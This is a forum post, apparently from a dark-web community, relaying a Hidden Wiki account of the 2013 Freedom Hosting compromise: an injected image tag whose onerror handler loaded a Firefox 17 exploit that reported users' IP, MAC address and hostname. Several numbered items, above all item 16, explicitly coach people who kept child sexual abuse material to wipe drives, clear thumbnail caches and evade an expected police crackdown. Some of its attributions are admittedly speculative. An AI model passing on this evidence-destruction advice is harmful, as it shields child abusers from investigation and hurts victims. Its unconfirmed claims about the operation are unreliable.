The Hidden Wiki discussion page has the most comprehensive explanation of the attack that I've found. The only part I don't agree with, simply because there is no evidence, is the claim that the FH admin was identified through bitcoin cashing out. It is factually incorrect that Onion Bank was started months ago. It was started like 10 days before the bust. However, the FH admin may have been accepting private bitcoin donations, particularly from the CP site operators and users. After all, someone was paying the bills to keep the site running. It's possible that the FBI made a donation and tracked the payment, and if the FH admin didn't take proper precautions in cashing out, he was identified that way. All this will come out in the discovery during his court case.
I do agree that the compromise of Tormail accounts could be very bad for some members of our community, especially if they didn't encrypt their emails and routinely delete read emails from the server.
Here's the Hidden Wiki discussion of the attack.
1. It runs only if Javascript was enabled and affects Firefox 17 on Windows. The exploit used (MFSA 2013-53) and was fixed in Firefox 17.0.7 which is the one used in the latest Tor Browser Bundle, and relies on Windows libraries to execute its payload. If you were using an outdated Tor Browser on Windows and you had Javascript enabled (it is by default) then you have definitely been compromised. If you were using Tor on any other OS, had disabled Javascript, or had the latest version of the Tor Browser Bundle (Torbrowser - Help - About shows the version, which must be 17.0.7 or higher) then you are safe and your public IP has not been transmitted anywhere.
2. The exploit has only been online since after the servers came back on August 3rd, 2013. Now read on for the details...
By default, the Tor Browser comes with NoScript set to "Allow All Javascript Globally", meaning that Javascript is enabled by default. They do this to make it convenient for users which is why it's the default setting even though it's not safe.
3. If you were running an exploitable version of the Tor Browser on Windows and didn't either manually set NoScript to "Forbid Javascript Globally" or disabled Javascript entirely via the Firefox settings, then you are absolutely 100% busted. But if you had disabled Javascript like smart people kept telling you, using either of the two methods mentioned, then the code never executed and you are safe.
4. The FreedomHosting compromise consisted of a small, non-existent image <img> tag injected into all Freedom Hosting sites, and this <img> tag contained an <img onerror=""> event attribute. The fact that the image was missing meant that the "onerror" code ran and retrieved the rest of the code from another Onion site. They did it this way via a small, hidden image to avoid drawing attention to any obvious <script> tags.
5. The main payload (main exploit code) from that onion site then created an iframe and set a cookie in it (the sole purpose of which was to reliably identify your unique browser as you traveled between different compromised FH sites, to build a list of which FH sites you've been visiting) and more importantly ran some 0-day exploits using heap overflows to run any code they desired and escape the Tor sandbox.
6. The 0day exploit code executed some functions that revealed your public internet IP address, MAC address, local hostname (such as "LarrysPC") and what Freedom Hosting site you were browsing (they used a unique UDID for each compromised website) and sent it all to a clear-net IP in Washington. This is no joke. I wish I was kidding. It really did this! They transmit your unique browser ID (cookie value) over the clear internet to their public-internet server, thus giving them a physical person tied to the "random person" they've been observing browsing the different FH sites. With this connection performed, they know your public IP, they have the computer's hostname & MAC address to conclusively identify your computer, they have your unique browser ID cookie, and they have a full list of Freedom Hosting sites that have been viewed by that unique browser. They know exactly how deeply you are involved and their lists allow them to target the people that are clearly intentionally seeking out illegal content.
7. The use of 0day exploits means that the attacker had the huge resources required to find such completely new exploits, and is therefore most likely the government.
8. The fact that FreedomHosting was compromised means that the attacker either physically seized the servers and installed the code (government), or managed to exploit the webserver software (other malicious attacker). Considering recent news reports, it is clear that it was the government.
9. The fact that the clear-net IP collecting all the data is in Washington and that FreedomHosting is now down without a word suggests that the attacker was in fact the FBI.
10. The attacker now has the public IP addresses + what FreedomHosting site you were viewing of everybody that had Javascript enabled on Windows with an outdated Tor Browser Bundle. You better prepare to be raided. Destroy all the evidence now, if your freedom depends on it.
11. The cookie is called "n_serv" and can be viewed under Tor Button - Cookie Protections. By default, Tor is set to erase all non-protected cookies on browser restarts (and to make all cookies non-protected unless explicitly told by the user to protect certain cookies). This means that the "n_serv" cookie will not persist between browser restarts, unless the FBI has made part of their exploit code tell Tor Button to protect the cookie. That is very unlikely, though, as it would be difficult to do so and wouldn't do them much good, since the cookie changing its value doesn't actually harm their operation. They will still get your public IP for every unique browser ID that's being transmitted to them, so it doesn't matter to them if the cookie gets cleared and the browser ID changes. Therefore, due to the fact that the cookie clears itself on restart, the only way to know if you've been affected if you're running a vulnerable browser bundle is if your browser has been running non-stop since before FreedomHosting went down. Meaning that your browser has been running for at least 1 week, preferably 2 or more. If you've got no "n_serv" cookie in a session that has lasted that long then you conclusively know that the exploits have never successfully executed on your machine. The cookie only clears on browser restart. I've always been using NoScript in "Forbid Javascript Globally" mode, my last browser restart was over 2 weeks ago and I am 100% sure I have browsed some FH sites before they went offline and without restarting this browser and I don't have the cookie. People that have either set NoScript to globally forbid, or disabled Javascript entirely in the Firefox settings, are therefore conclusively safe. Everyone else will have been infected and can check for the existence of that cookie to verify that fact (will only be there if their browser hasn't restarted in the past few weeks). Note that the cookie will be created if Javascript is enabled, but the exploit that transmits your public IP to tie that cookie to your identity is a separate action and will only run on exploitable (outdated) Tor Browser Bundles on Windows. Therefore, the existence of the cookie is not enough reason to panic yet. If you're using Windows and you've got a Javascript-enabled Tor Browser that's older than 17.0.7 then your identity has absolutely been compromised.
12. Previous news reports from July 29th, 2013 shows that the FBI performed a nationwide "child sex trafficking" bust, freeing 105 children and arresting 150 pimps/ring leaders (www.fbi.gov/news/stories/2013/july/operation-cross-country-recovering-victims-of-child-sex-trafficking/operation-cross-country-recovering-victims-of-child-sex-trafficking).
13. Other news from July 29th, 2013 shows that the FBI is trying to extradite "the biggest child-porn facilitator on the planet" from Ireland (www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html). Seems that the FH admin was a 28 year old that was arrested in Ireland and that the javascript exploits were set up in a joint-operation between the FBI and the Irish law enforcement since all collected IPs were sent to the FBI. If this is the guy, then Freedom Hosting is never coming back, and he's looking at a lot of jailtime.
14. Also consider the fact that the attackers installed code that uniquely identifies each FreedomHosting site you were visiting, since FH served much more than just child porn. The FBI wouldn't want to bust down the doors of people that were looking at relatively harmless stuff from FreedomHosting. They really cared about knowing which specific sites you were viewing and took many steps to ensure that they accurately tracked which sites you visited, through the use of per-site UDIDs and a tracking cookie.
15. Timeline of events: FreedomHosting admin starts accepting BitCoins a few months ago. The FBI traces his BitCoin transactions to withdrawals into a real-world bank account via currency exchange services, thus revealing the identity of the FH admin, and an arrest is made on July 29th, 2013 in Ireland. The servers were then shut down. On August 3rd, 2013 the sites came back online with the exploit code installed.
16. It is pretty conclusive: Get a fucking move on if you were too stupid to disable Javascript, keep Tor Browser Bundle updated, were running Windows, and visited any of the FH sites after they came back online. You do not have much time. Someone in Washington, otherwise known as the FBI, now has your public IP and a list of which FH sites you were browsing. GET A FUCKING MOVE ON! NOW! Destroy everything before you end up behind bars! Remember to run multiple secure wipe-passes of your entire hard drives so that NOTHING can be recovered, and remember that encryption alone is not safe enough, data leaks out of your encrypted containers into the operating system's thumbnail caches. They might not be able to view your actual encrypted TrueCrypt images, but they sure as hell can see what kind of images you had been looking at in the past (Windows has a global thumbnail database containing smaller versions of all Thumbs.db contents from every drive on the system, Mac OS has a QuickLook cache of everything you have ever viewed, and Linux has similar leaks depending on what image viewers you were using). Also remember that they can force you to give up encryption keys (and even sentence you harshly based on suspicion if you refuse to give it out), so it's definitely not safe to keep encrypted TrueCrypt containers. Your freedom should be worth more than that. Take no chances. Perform a full 3-pass random DBAN (http://www.dban.org/) format of ALL hard disks that were used for child porn AND ALL operating system disks related to that! We are on the verge of a global law-enforcement crackdown unlike anything else ever before once the FBI uses the data they have collected, and you may only have a few days until the knock comes. Don't waste time with 35-pass erases, it takes days and they may knock on the door sooner than it can finish and research shows that even a single-pass erase is safe enough, but if you are truly paranoid (even though you would not gain anything from it and would only waste more time) you could do 3 random passes just to be extra safe. Good luck everyone and may God be with you. Time to brace for impact. And remember that silence does not mean that nothing is going on. People that are getting busted won't have any time to connect to Tor and let others know they've been busted. Silence does not mean that busts are not taking place. The FBI is taking this FreedomHosting compromise as the biggest victory in human history. You should treat it with equal respect and do everything in your power to stay safe. This is the calm before the storm. You will see the victims being paraded around in a giant FBI press release within a month or two.
17. For those that had blocked Javascript and are safe: It's now a good idea to remember that Tor should never be trusted, and that any content from Tor sites can be compromised at any time. Always be sure to update your media players such as VLC to the latest versions to protect against exploits in media files. There are no signs that such tampering has taken place, but this is a good time to remind people to be smart. How to be as safe as you can be: 1: Keep Tor Browser Bundle up to date every time you get an update notification. 2: Always disable Javascript. 3: Always keep all your software fully updated. 4: Run everything in a Virtual machine (VirtualBox is free) to avoid data leaking out into your main OS. 5. Use Linux in that VM even if you are primarily a Windows user, because Linux is a fuckton more resilient against attacks. 6: Use encrypted containers inside the VM if your freedom depends on your data being safe from prying eyes. 7: Trust noone. Never reveal personal info on Tormail (now compromised) or even Torchat. You never want to leak anything that leads back to you. Always assume that everyone is out to get you and you will never have the issue of trusting the wrong person.
18. More warnings (TORMAIL): The hidden service for Tormail has been compromised since it ran on FreedomHosting. It's therefore very likely that all the contents of your Tormail inboxes are in their hands. Do not log into your accounts. Depending on how Tormail works, your emails might possibly have been stored in encrypted form in the database and will only be decrypted whenever you log in. In that case, they can only read them by installing a backdoor that makes unencrypted copies as soon as someone logs into their account. Logging in would thereby give them the unencrypted versions. Alternatively, if Tormail already stored everything unencrypted then they already have a complete copy of it and no logging-in-and-deleting will do any good whatsoever. Unfortunately everything points towards Tormail just using a regular IMAP mail server hosted on Freedom Hosting (because of how they allowed regular Roundcube / SquirrelMail access to your mailbox, both of which are just regular unencrypted IMAP web clients), and that would mean that all plaintext emails are already in the FBI's hands and there's nothing you can do about it. Do not log in. Logging in can only make things worse! Tormail is guaranteed to be a major part of this sting because it (along with certain private messaging systems on boards) is the most likely place where people will reveal their true identities to people they've trusted. Tormail has been compromised and all you can do now is NOT log in, and pray that everything was stored as decrypt-on-demand via custom IMAP server software (unfortunately extremely unlikely because no off-the-shelf IMAP servers offer encrypted email storage). That, and destroy all the evidence so that anyone knocking down your door will find nothing on your computers.
Show Posts
